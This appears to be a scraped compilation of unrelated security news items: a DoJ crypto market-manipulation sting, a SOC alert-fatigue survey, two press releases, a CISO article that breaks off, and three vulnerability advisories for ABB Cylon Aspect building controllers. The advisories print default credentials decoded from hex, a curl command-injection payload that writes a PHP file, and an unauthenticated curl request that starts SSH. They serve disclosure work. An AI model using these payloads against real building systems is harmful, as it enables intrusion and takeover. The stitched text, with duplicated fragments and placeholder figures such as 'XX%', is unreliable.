The U.S. Department of Justice (DoJ) has announced arrests and charges against several individuals and entities in connection with allegedly manipulating digital asset markets as part of a widespread fraud operation.
The law enforcement action – codenamed Operation Token Mirrors – is the result of the U.S. Federal Bureau of Investigation (FBI) taking the "unprecedented step" of creating its own

Cryptocurrency / Cybercrime

The U.S. Department of Justice (DoJ) has announced arrests and charges against several individuals and entities in connection with allegedly manipulating digital asset markets as part of a widespread fraud operation.

The law enforcement action – codenamed **Operation Token Mirrors** – is the result of the U.S. Federal Bureau of Investigation (FBI) taking the "unprecedented step" of creating its own cryptocurrency token and company called NexFundAI.

NexFundAI, as per information on the website, was marketed as redefining the "intersection between finance and artificial intelligence" and that its aim was to "create a cryptocurrency token that not only serves as a secure store of value but also acts as a catalyst for positive change in the world of AI."

"Three market makers — ZM Quant, CLS Global, and MyTrade — along with their employees are charged with allegedly wash trading and/or conspiring to wash trade on behalf of NexFundAI, a cryptocurrency company and token created at the direction of law enforcement as part of the government's investigation," the DoJ said.

"A fourth market maker, Gotbit, its CEO, and two of its directors are also charged for perpetrating a similar scheme."

A total of 18 people and entities have been ensnared in the investigation's net, out of which five defendants have either pleaded guilty or agreed to plead guilty. Three other defendants have been arrested in the U.S. state of Texas, the U.K., and Portugal.

More than $25 million in cryptocurrency has also been confiscated and multiple trading bots behind wash trading (aka round trip trading), which refers to the illegal practice of buying and selling the same financial instruments to create artificial market activity, for about 60 different cryptocurrencies have been disabled.

Court documents allege that the defendants behind the cryptocurrency companies executed bogus trades using their own tokens to give the impression that they are good investments in an attempt to attract new investors and purchasers, thereby synthetically inflating the tokens' trading prices.

The individuals then sold their tokens at the new prices, a fraudulent scheme known as pump-and-dump, in order to illegally profit from the financial crime.

The following individuals and cryptocurrency firms have been charged -

*   Aleksei Andriunin, Fedor Kedrov, Qawi Jalili, Gotbit Consulting LLC (Gotbit)
*   Riqui Liu, Baijun Ou, ZM Quant Investment LTD (ZM Quant)
*   Andrey Zhorzhes, CLS Global FZC, LLC (CLS)
*   Liu Zhou, MyTrade MM
*   Manpreet Kohli, Haroon Mohsini, Nam Tran, Max Hernandez, Russell Armand, Vy Pham, Saitama LLC (Saitama)
*   Robo Inu Finance (Robo Inu)
*   Michael Thompson, VZZN, and
*   Bradley Beatty, Lillian Finance LLC (Lillian Finance)

"Today's enforcement actions demonstrate, once more, that retail investors are being victimized by fraudulent activity by institutional actors in the markets for crypto assets," Sanjay Wadhwa, deputy director of the SEC's Division of Enforcement, said.

"With purported promoters and self-anointed market makers teaming up to target the investing public with false promises of profits in the crypto markets, investors should be mindful that the deck may be stacked against them."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

FBI Creates Fake Cryptocurrency to Expose Widespread Crypto Market Manipulation

Threat detection tools yield too many false positives, security pros say, leading to burnout and resentment.

Source: ZUMA Press, Inc. via Alamy Stock Photo

Security operations center (SOC) practitioners are struggling, thanks to an overwhelming volume of false alarms from their security tools.

A Vectra survey of hundreds of cybersecurity professionals revealed a serious gripe that SOC teams have with their software vendors. The overwhelming volume of false positives their tools yield is causing burnout, they say, and allowing real threats to slip through the noise.

"There wasn't that much of a change from last year's results, and honestly it wasn't much of a surprise," says Mark Wojtasiak, vice president of research and strategy at Vectra AI. "SOC practitioners are clearly still frustrated with threat detection tools. And, really, what the data tells us is that, more than a threat detection problem, SOC teams have an attack signal problem. The promise of consolidation and platformization have yet to take hold, and what SOC teams really need is an accurate attack signal."

**What Does the SOCs Say? Ding Ding Ding**

SOCs ingest an average of 3,832 security alerts per day. For a sense of just how unmanageable that might be, consider that an average SOC might be staffed by a few dozen people, or just a few, depending on the size of the organization and its investment in security.

The result: 81% of SOC staffers spend at least two hours a day simply sifting through and triaging security alerts. It's no wonder, then, that 54% of Vectra respondents said that, rather than making their lives easier, the tools they work with increase their daily workloads, and that 62% of security alerts ultimately just get ignored.

Of course, SOC operators are aware of the implications of ignored security warnings. A full 71% reported worrying every week that they'll miss an attack buried in a flood of less important alerts. And 50% went so far as to say that their threat detection tools are "more hindrance than help" in spotting real attacks.

The conflict between what operators are dealing with, and what they can handle, is fostering genuine resentment toward vendors. Around 60% of respondents reported that they've been buying security software mostly just to tick a compliance box, and 47% don't trust these programs outright. A similar percentage (62%) believe that vendors are intentionally, cynically flooding them with alerts so that when a breach occurs, they're more likely to be able to say: We warned you!

A majority (71%) of SOC practitioners say that vendors need to take more responsibility in failing to prevent breaches.

**How AI Can Make SOCs More Efficient**

The most attainable, practical promise of artificial intelligence (AI) is that it will reduce the tedium associated with repetitive jobs, and bolster productivity. And more so than most, SOC staffers stand to benefit from exactly that.

In fact, Wojtasiak says, AI is the path to a whole mindset shift. "Security thinks in terms of individual attack surfaces: I have a network, endpoints, identities, email, now generative AI (GenAI). OK. I'm going to go buy tools to do threat detection across those siloed attack surfaces, then ask a human being to make sense of it all. That's how security thinking has fundamentally been for the past 10 years," he says.

"Modern attackers," he continues, "just see one, giant attack surface that they can move around in. So why isn't security thinking the same way? Why aren't we looking at threats holistically across the entire attack surface, using AI to piece together detections that are indicative of attacker behavior, correlating those detections, and then giving one integrated signal to the SOC analyst?"

Plenty of SOCs are already starting to do just that. About 67% of Vectra survey respondents found that AI is already improving their ability to identify and defend against threats, and 73% claimed that that's helped ease their feelings of burnout. Nearly nine in 10 respondents have already boosted their investments in AI, and are planning to go further.

"I'm \[already\] hearing about the positive outcomes they're experiencing as they introduce these new tools — reduced workloads, less burnout, and less sprawl," Wojtasiak reports. "The hope is that current frustrations will ease as siloed legacy tools are replaced by AI-powered tools capable of delivering an accurate attack signal."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

SOC Teams: Threat Detection Tools Are Stifling Us

PRESS RELEASE

New York, United States, Oct. 10, 2024 (GLOBE NEWSWIRE) -- The Certificate Authority (CA) market is the industry dedicated to the issuing, management, and renewal of digital certificates. These digital certificates are used to authenticate the identification of entities such as websites, organizations, or individuals, as well as to secure network interactions with encryption. CAs are trusted third-party organizations that verify entities' identities and provide certificates to establish secure connections, such as SSL/TLS certificates for websites. This market is essential to the overall cybersecurity ecosystem as it maintains the security, integrity, and trustworthiness of digital communications and transactions on the Internet.

Download Free Sample Report PDF @ https://straitsresearch.com/report/certificate-authority-market/request-sample 

Market Dynamics

Focus on Cybersecurity Integration drives the global certificate authority market.

Certificate Authorities (CAs) are expanding their services to include broader cybersecurity solutions such as threat detection and identity management, resulting in more comprehensive security offerings. They collaborate with cybersecurity firms to integrate certificate management with other important security services, giving organizations an integrated and effective protection approach.

*   For instance, on 10 October 2023, DigiCert expanded its capabilities by integrating its certificate management services with Acronis' cybersecurity and data protection solutions.
    

The emergence of Blockchain Technology creates opportunities for the global certificate authority market.

Blockchain technology's decentralized and tamper-proof mechanism improves the security and transparency of digital certificate issuance and maintenance. This significant development has the potential to eliminate fraud, increase trust, and alter the certification authority market by developing more secure and efficient certificate management systems.

*   For instance, in March 2024, Tezos introduced a blockchain-based certificate management system known as Tezos DigiSign.
    

Regional Analysis

North America is the dominating region in the global certificate authority market shareholder and is anticipated to exhibit a CAGR of XX% during the forecast period. North America dominates the certificate authority market due to its modern IT infrastructure, high cybersecurity awareness, stringent regulatory environment, and the presence of major CA providers such as DigiCert and GlobalSign, which offer a wide range of digital certificate solutions. This region has strong adoption rates of digital certificates, particularly in finance, healthcare, and government.

The United States and Canada are the primary contributors to the North American certificate authority market, benefitting from their strong economies and a significant focus on cybersecurity in sectors such as banking, healthcare, e-commerce, and government services.

The Asia-Pacific (APAC) region is the fastest-growing market for certificate authorities, driven by rapid digitalization, cloud adoption, government initiatives, and significant investments in cybersecurity. Governments in China, India, and Japan are implementing policies and regulations to improve secure communication and protect sensitive data, such as China's security law, National Cyber Security Policy, and Japan's Act on the Protection of Personal Information, which is driving demand for certificate authority (CA) solutions.

These countries are major players in the APAC region, with both local and global CA providers such as CNNIC, e-Mudhra, JPRS, and DigiCert catering to a wide range of demands. The region's diverse legal frameworks and cybersecurity practices have an impact on digital certificate adoption.

Europe's certificate authority market is influenced by a wide range of regulatory standards, and a strong focus on data protection, particularly under GDPR. The market includes a mix of local and international CA providers like Entrust and Sectigo, and increasing adoption in industries including banking, telecommunications, and e-commerce. The region is distinguished for its diverse regulatory environment.

The certificate authority market in Latin America is rising and growing, due to increased digital transformation initiatives in a variety of sectors. Rising cybersecurity concerns and regulatory demands are driving the region's adoption of digital certificates.

The Middle East and Africa region is experiencing an increase in the adoption of digital certificates as businesses and governments seek to improve their cybersecurity posture. Rising digital transactions, legal restrictions, and increased data protection awareness drive the market.

To Gather Additional Insights on the Regional Analysis of the Certificate Authority Market @ https://straitsresearch.com/report/certificate-authority-market/request-sample 

Competitive Players

5.  Entrust Datacard Corporation
    

10.  WISeKey International Holding AG
    

Recent Developments

*   On 12 April 2023, Entrust Launched Zero Trust Ready Solutions for Passwordless Authentication, Next-Generation HSM, and Multi-Cloud Key Compliance
    
*   On 9 May 2023, DigiCert announced a partnership with Oracle to make DigiCert ONE, the platform for digital trust, available on Oracle Cloud Infrastructure (OCI).
    
*   On 7 March 2023, GlobalSign announced a technology partnership with essendi it to integrate Essendi's xc certificate lifecycle management (CLM) software with GlobalSign’s certificate platform, Atlas.
    
*   on 10 October 2023, DigiCert expanded its capabilities by integrating its certificate management services with Acronis' cybersecurity and data protection solutions.
    
*   In January 2023, DigiCert launched the DigiCert Trust Lifecycle Manager, a comprehensive digital trust solution designed to unify certificate management and public key infrastructure (PKI) services.
    

Segmentation

2.  By Certificate Validation Type 
    

Get Detailed Market Segmentation @ https://straitsresearch.com/report/certificate-authority-market/segmentation 

About Straits Research Pvt. Ltd.

Straits Research is a market intelligence company providing global business information reports and services. Our exclusive blend of quantitative forecasting and trends analysis provides forward-looking insight for thousands of decision-makers. Straits Research Pvt. Ltd. provides actionable market research data, especially designed and presented for decision making and ROI.

Whether you are looking at business sectors in the next town or crosswise over continents, we understand the significance of being acquainted with the client’s purchase. We overcome our clients’ issues by recognizing and deciphering the target group and generating leads with utmost precision. We seek to collaborate with our clients to deliver a broad spectrum of results through a blend of market and business research approaches.

Certificate Authority Market Size to Surpass $485M by 2033

PRESS RELEASE

SAN FRANCISCO, Oct. 10, 2024 /PRNewswire/ -- Relyance AI, the leading AI-powered data governance platform that provides complete visibility and control over enterprise-wide data, today announced a $32.1 million Series B funding round to scale operations and meet the needs of the exploding use of artificial intelligence in the enterprise. Thomvest Ventures led the round. M12, Microsoft Ventures Fund, also participated in addition to Cheyenne Ventures and existing investors Menlo Ventures and Unusual Ventures.

As demand for AI surges in the enterprise, global regulators are mandating data protection safeguards that companies find impossible to implement. At the same time, legal, security, and engineering teams are grappling with endless questions about how customer data is being used to train AI models. The impact? Executives are stifled by their inability to realize AI's innovation potential, and according to KPMG, more than two-thirds (76%) of enterprises are worried about data privacy and security when they partner with third parties. The result could be catastrophic: more than a quarter of the Fortune 500 identified AI regulation as a risk in annual reports to the SEC, and many continue to struggle with established data privacy regulations such as GDPR, which led to a record €2.1 billion in fines in 2023.

This has become a business-critical problem for all enterprises that was impossible to solve before Relyance AI's fully integrated governance platform. Until now, privacy and security have been seen as separate challenges, with one woefully unaware of the other. Privacy teams didn't know if their commitments to regulations and customers were being met, and security teams didn't know what data should be in AI models. Relyance AI marries the two into one joint solution, which is the only way to enable innovation while ensuring compliance in a rapidly evolving regulatory landscape.

"The era of accepting subpar privacy, DSPM, and AI governance solutions is over. Relyance AI sets a new standard where data protection and innovation are not mutually exclusive," said Abhi Sharma, CEO and co-founder of Relyance AI. "It's impossible to keep up with the current state of regulations, especially when GDPR, HIPAA, the EU's AI Act, and a mosaic of local U.S. privacy laws are all different and sometimes at odds. We're making it possible to demystify this and embolden the C-suite, engineers, and legal teams to urgently green-light AI in the enterprise with an integrated governance approach." 

Relyance AI safeguards businesses from fines and reputation damage while boosting customer trust to accelerate business growth. The platform provides complete visibility into enterprise-wide data processing and compares it against contractual commitments, global privacy regulations, and compliance frameworks. The company has scaled significantly to meet recent demand for these capabilities. In the first half alone, Relyance AI increased its enterprise customer base by 30%, and the company is projected to double its annual recurring revenue in 2024. Its client list now includes Coinbase, Fivetran, Verkada, Snowflake, Logitech, Plaid, and Notion.

"We're thrilled to lead the investment in Relyance AI, a unique, automated data governance platform that addresses the urgent need for real-time data visibility and compliance in a world of explosive data growth and emerging regulations," said Umesh Padval, Managing Director, Thomvest Ventures. "Relyance AI empowers Chief Privacy, Security, and Information Officers to manage data privacy and compliance, avoiding costly penalties while driving safe and responsible AI adoption. We are excited to partner with CEO Abhi Sharmaand his team, who have built a solution that transforms compliance into a competitive advantage, enabling businesses to scale AI with trust and transparency."

"The future of AI governance isn't about compliance alone – it's about building trust, transparency, and accountability into every layer of your technology," said Todd Graham, Managing Partner at M12. "Relyance AI is the catalyst for that transformation, paving the way for AI implementation that is both compliant and incredibly fast."

"With Relyance AI, we established enhanced visibility of data processing activities, seeing an impressive increase of 1,660% within three weeks of deployment," said Deborah Usry, Senior Privacy and Product Counsel at NextRoll. "What used to be a time-consuming manual process is now an automated task that produces a robust record of our processing activities."

The funding will further develop Relyance AI's platform and scale its go-to-market efforts in response to significant recent momentum. Learn more here.

About Relyance AI  
Relyance AI is the new standard for organizations trust and data governance infrastructure. Relyance AI is the only platform providing real-time visibility into how and where data is being used compared to customer agreements, global privacy regulations, and compliance frameworks. Companies of all industries and sizes – including Coinbase, Snowflake, Logitech, Plaid, Notion, and more – trust Relyance AI to safeguard businesses from fines and reputational damage and to deliver the most complete customer trust experiences.

Relyance AI Raises $32M Series B Funding to Safeguard AI Innovation in the Enterprise

ABB Cylon Aspect version 3.07.02 uses a weak set of default administrative credentials that can be guessed in remote password attacks and used to gain full control of the system.

  
ABB Cylon Aspect 3.07.02 (user.properties) Default Credentials

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.02

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller uses a weak set of default administrative  
credentials that can be guessed in remote password attacks and gain full  
control of the system.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5840  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5840.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ cat /home/MIX_CMIX/htmlroot/user.properties  
#Users  
#Mon Mar 20 13:30 EDT 2016  
guest=6775657374  
aamuser=64656661756c74

Using Utils::Hex2String in AuthSession.php:

guest:guest  
aamuser:default

ABB Cylon Aspect 3.07.02 user.properties Default Credentials

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the MODEM HTTP POST parameter called by the dialupSwitch.php script.

  
ABB Cylon Aspect 3.08.00 (dialupSwitch.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'MODEM' HTTP POST parameter called by the dialupSwitch.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5839  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5839.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl -X POST "http://192.168.73.31/dialupSwitch.php" \  
> -H "Cookie: PHPSESSID=xxx" \  
> -H "Content-Type: application/x-www-form-urlencoded" \   
> -d "MODEM=;echo '<?php phpinfo(); ?>'>j.php"\  
> &Submit=Save"

ABB Cylon Aspect 3.08.00 dialupSwitch.php Remote Code Execution

ABB Cylon Aspect version 3.07.02 suffers from a vulnerability that allows an unauthenticated attacker to enable or disable the SSH daemon by sending a POST request to sshUpdate.php with a simple JSON payload. This can be exploited to start the SSH service on the remote host without proper authentication, potentially enabling unauthorized access or stop and deny service access.

**ABB Cylon Aspect 3.07.02 sshUpdate.php Unauthenticated Remote SSH Service Control**

    ABB Cylon Aspect 3.07.02 (sshUpdate.php) Unauthenticated Remote SSH Service ControlVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.07.02Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The BMS/BAS controller suffers from a vulnerability that allows anunauthenticated attacker to enable or disable the SSH daemon by sending aPOST request to sshUpdate.php with a simple JSON payload. This can be exploitedto start the SSH service on the remote host without proper authentication,potentially enabling unauthorized access or stop and deny service access.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5838Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5838.phpCWE ID: 306CWE URL: https://cwe.mitre.org/data/definitions/306.html21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                $ curl -X POST "http://192.168.73.31/sshUpdate.php" \> -H "Content-Type: application/json" \> -d "{\"serviceAction\":\"start\", \"key\":\"sshenable\"}"

ABB Cylon Aspect 3.07.02 sshUpdate.php Unauthenticated Remote SSH Service Control

CISOs in consumer and retail organizations appear to accept greater risks to allow for more innovation, which could be a model for future growth.

Source: FOTOGRIN via Shutterstock

Chief information security officers (CISOs) have long borne the reputation of blocking innovation to keep their organization and all its data safe and sound.

However, those competing priorities appear to be shifting, especially in the retail and consumer sectors. While the majority of CISOs (59%) across all sectors see themselves as "enablers" — as opposed to just managers of cyber-risk — nearly all (97%) CISOs in the retail segment view their role as an enabler, according to a survey of more than 1,000 global CISOs conducted by cybersecurity firm Netskope. As a result, CISOs' acceptance of risk has grown, with the majority of all CISOs ready to take on more risk compared with five years ago. For the retail sector, the share of risk-embracing CISOs is even higher (74%).

The pressure on companies to innovate — and CISOs' understanding of their role in making that happen — are driving CISOs to become risk-takers, Netskope CISO James Robinson says.

"Typically, you had someone who was really, really technical, and they were working through things, but they really didn't have that business side of the brain — knowing the business metrics and data," he says. "CISOs have moved from the need to say no and maybe even taken it a step further — saying the answer is always, "Yes, just how do we get there?'"

From gift-card scams to brand hijacking for phishing attacks to devastating ransomware, retailers are a popular target for cybercriminals and fraudsters. At the same time, the retail sector has had to weather the chaos caused by the pandemic and supply-chain disruptions, which led to demand fluctuations and a loss of brand loyalty. The subsequent spike in inflation over the past two years left many consumers prioritizing price. Most retail executives (67%) expect consumers to purchase fewer products in 2024, and so retailers are increasingly focused on winning loyalty, according to consultancy Deloitte's "2024 US Retail Industry Outlook" report.

**Security in the Era of Amazon and AI**

With all those disruptive forces in the market, retailers have had to transform themselves to compete, morphing from just focused on selling products to becoming data companies. Consequently, CISOs at retail companies can no longer afford to focus solely on putting a wall around their information, says Netskope's Robinson.

Like other members of the C-suite, CISOs have to be thinking about the business more holistically, Robinson says.

"Retailers now have to ask, 'What's the next innovation? What's the next thing we have to do?'" he says. "And all of those decisions are data driven ... they're being led by this wealth of data that they're collecting, so that they can have targeted experiences for their customers."

Artificial intelligence is one obvious way to innovate. A great deal of the pressure to change over the past two years has come from the development of AI capabilities and businesses' fear of missing out on any innovations — and competitive advantages. In-store cameras paired with AI analysis can determine consumer interest in products, ecommerce platforms can better predict inventory, and stores can even use recognition of facial expressions to gauge consumer sentiment.

While most companies have slowly tested the waters of AI, many will be putting their first AI-powered applications into product in the next 12 months, Robinson says.

"This is the first year also that we're really seeing GenAI projects kick off, and in the next year, we'll start to really see kind of the value of some of these projects," he says. "So I think that's probably what's shaping it even more."

**The Business-Focused CISO**

Yet, AI and cybersecurity are two technology areas that are least likely to have positive returns on investments for retailers, according to consultancy KPMG's 2023 "US Consumer and Retail Sector Insights Report." Only 46% of survey respondents noted an increase in profitability or performance due to AI — and 45% from cybersecurity. But the consumer and retail sector fell even short of that threshold, with 38% and 37% of respondents, respectively, in those industries seeing a return on investment from AI or cybersecurity.

"For many consumer and retail organizations, getting data right is still a work in progress," KPMG stated in the report.

Understandably, there are still some risks where CISOs are unwilling to compromise. Sharing information with outside parties or third parties without the proper review and without the proper agreement in place — a threat becoming more common in the era of AI — is just not possible, says Robinson.

